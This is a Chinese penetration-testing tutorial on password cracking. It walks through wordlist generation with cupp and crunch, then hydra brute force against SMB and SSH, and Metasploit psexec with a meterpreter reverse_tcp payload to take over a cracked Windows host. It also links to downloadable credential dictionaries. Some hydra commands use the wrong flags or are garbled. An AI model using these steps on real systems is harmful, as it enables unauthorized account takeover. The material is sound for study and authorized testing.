2022-渗透测试-口令破解-几款暴力破解和字典生成的工具
目录
1.CUPP(kali)
2.亦思社会工程学学点生成器
3.一句话密码破解工具
4.crunch(kali)
5.hydra(kali)
1.CUPP(kali)
首先,安装cupp软件
apt install -y cupp
新建一个文件夹,用于保存生成的字典
输入 cupp -i 命令开始编辑生成字典
根据自己已知的信息,生成字典。
查看生成的字典 cat san.txt
2.亦思社会工程学学点生成器
3.一句话密码破解工具
4.crunch(kali)
crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。
首先,先尝试一个简单的命令。如图所示。1 8表示密码是8位 后面的是密码的范围,我们可以看出按照这种方式输出的字典有23TB。(切记,运行一下立马暂停,否则会卡死)
查看帮助
man crunch > crunch.help命令格式
crunch <min-len> <max-len> [<charset string>] [options]参数说明
min-len 设定最小字符串长度(必选)
max-len 设定最大字符串长度(必选)
charset string 字符集
options
-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,即包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件
特殊字符
% 代表数字
^ 代表特殊符号
@ 代表小写字母
, 代表大写字母查看库文件
cat /usr/share/crunch/charset.lst
如图所示,前面显示的名称,后面显示的内容是字符集 。这些都是设置好的,我们也可以自定义写一个字符集。
例子1:生成-1-8位密码字典,字符集合为小写字母,从a开始到zzzzzzzz结束
crunch 1 8
例子2:生成1-6位的密码字典,字符集合为[abcdefg],从a开始到gggggg结束
crunch 1 6 abcdefg
例子3:生成指定字符串,比如生日的日期(%代表数字)
crunch 8 8 -t 199307%% -e 19930730
例子4:生成元素的组合,比如123.com
crunch 7 7 -t %%%.com -s 111.com -e 123.com
例子5:在字典中输出特殊字符
crunch 3 3 abc -t @@@ -l @aa
例子6: 以元素组合生成字典[zhangsan|1993|0701]
crunch 4 4 -p zhangsan 1992 0701
例子6:
自定义字符集合
vim /usr/share/crunch/charset.lst
创建自定义字符集合
添加一个字符集
使用自定义字符集生成[*.com] 字典文件
crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com
5.hydra(kali)
首先,先准备两个文件:常用的账号和密码文件。这个是我从github下载的,账号和密码都有几千条。文章最后,我会将文件下载地址分享一下。
windows口令破解
hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr-l 指定一个用户名
-p 指定一个密码
-P 指定密码字典
-L 指定用户名字典
-vV 显示爆破细节
-o 保存爆破结果
-f 找到正确的密码就停止爆破
-e n nulls samer 反向
-t 线程爆破成功后,我们使用msf中的use exploit/windows/smb/psexec模块去链接。
建立payload set payload windows/meterpreter/reverse_tcp
查看需要配置的参数 show options
设置目标主机 set RHOSTS 192.168.0.110
设置账号和密码 set SMBPass xxx set SMBUser xxx
run或者exploit进行连接
linux口令破解
linux口令破解,也分为远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。
破解ssh服务
hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64分享下载链接
亦思社会工程学字典生成器
一句话密码破解工具
常用的账号和密码字典
链接:https://pan.baidu.com/s/1ErRFv4vnpHZxIufOhCjK3g
提取码:bc9o
2022-渗透测试-口令破解-几款暴力破解和字典生成的工具相关推荐
- 渗透测试实验_使用BurpSuite暴力破解DVWA密码 BurpSuite四种暴力破解类型 安全等级Low Medium High
文章目录 暴力破解 1. Brute Force(暴力破解) 原理 2. BurpSuite 四种暴力破解类型 3. Low等级 Sniper(狙击手)类型 Battering ram(撞击物)类型 ...
- 口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解
Telnet协议暴力破解 Telnet Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式.它为用户提供了在本地计算机上完成远程主机工作的能力.要开始一个 ...
- 如何防止自己的云服务器被暴力破解密码(限制暴力破解并发送邮件到自己的邮箱)
如何防止自己的云服务器被暴力破解密码(限制暴力破解并发送邮件到自己的邮箱) 今天看到自己的阿里云服务器被别有用心的人gank一波,于是才想到得设置一套完美的防火墙策略了 首先黑客登录失败的日志为/va ...
- 010破解(一)之暴力破解
010破解(一)之暴力破解 010介绍 010是非常好用的16进制编辑工具 功能介绍: 16进制修改 文本修改 模板解析各种文件格式 对比文件 暴力破解分析 分析思路: 找到注册窗口 测试注册窗口反应 ...
- 2022渗透测试-3款最常用的漏洞扫描工具
目录 1.nessus 2.AWVS 3.WPscan 1.nessus 1.Nessus软件是什么? 如图,我们可以从百度百科得知:Nessus 是全世界最多人使用的系统漏洞扫描与分析软件.总共有超 ...
- 2022渗透测试-推荐一款漏洞扫描工具-AWVS安装与使用
目录 AWVS简介 AWVS功能介绍 AWVS的安装 AWVS的使用 大家可以关注关注我的公众号 定期分享一些干货 直接搜索-小白渗透测试,或者扫描下面的二维码就可以了 AWVS简介 AWVS是一个自 ...
- 2022渗透测试-面试题目大全
1.拿到一个待检测的站,你觉得应该先做什么? (1)信息收集 1.获取域名的 whois 信息,获取注册者邮箱姓名电话等. 2.查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁 站有没有 ...
- 系统渗透与防护——信息收集与暴力破解
信息收集 什么是扫描 指利用工具或软件来探测目标网络或主机的过程,是搜集信息的必备环节,用来获取目标的系统类型/软件版本/端口开放情况等信息,也可以检测己知或潜在的漏洞 常见扫描工具 Ping nma ...
- 破解wifi密码 暴力破解 保姆式教学
首先需要安装kali系统 这个系统是安装在虚拟机上的 还需要一个无线网卡(最好是kali系统免驱的 否则是无法识别的) 有着两个工具就可以破解密码了 kali官网:Kali Linux | Penet ...
- 2022渗透测试-文件上传漏洞的详细讲解
目录 1.什么是文件上传漏洞 2.生成图片木马 3.靶场 1.第一关 2.前端检测(第二关) 3.服务器端检测--MIME类型(第二关) 4.服务器端检测--文件类型(第十四关) 5.服务器文件内容验 ...
最新文章
- Ubuntu PyCharm cv2 无代码提示解决方法
- 20169211 2016-2017-2 《移动平台开发实践》 第十周实验总结
- 哈啰在分布式消息治理和微服务治理中的实践
- Linux tar vi gcc 指令
- linux挂载efi分区,IBM X3850安装linux出现 您还么有创建/boot/efi分区 解决办法
- HTML5的入门教程
- 使用Xshell通过堡垒机登录服务器
- 小例子背后的大道理——Adapter模式详解
- IntelliJ IDEA+Maven运行apache-storm的LocalCluster例子
- 图像空域增强:卷积运算法
- Shell 工具(cut)
- android 圆形自定义进度条,自定义Android圆形进度条(附源码)
- 将VRoidStudio人物通过Blender导入到Mixamo
- iphone计算机的声音,苹果电脑如何自定义声音怎么设置
- 【Redis】回顾下Redis的过期策略
- chrome控制台如何把vw显示成px_Chrome 开发者工具的11 个高级使用技巧
- 惠普计算机使用方法,惠普笔记本电脑功能键(HP/联想等笔记本键盘fn键使用说明大全)...
- js设置弹出式独立窗口页面,和 window 的方法
- 怎么调用onenet平台的API从而读取我们的设备数据和下发命令,做到控制开关
- TPAC 2019 小会之 WebCodecs 提案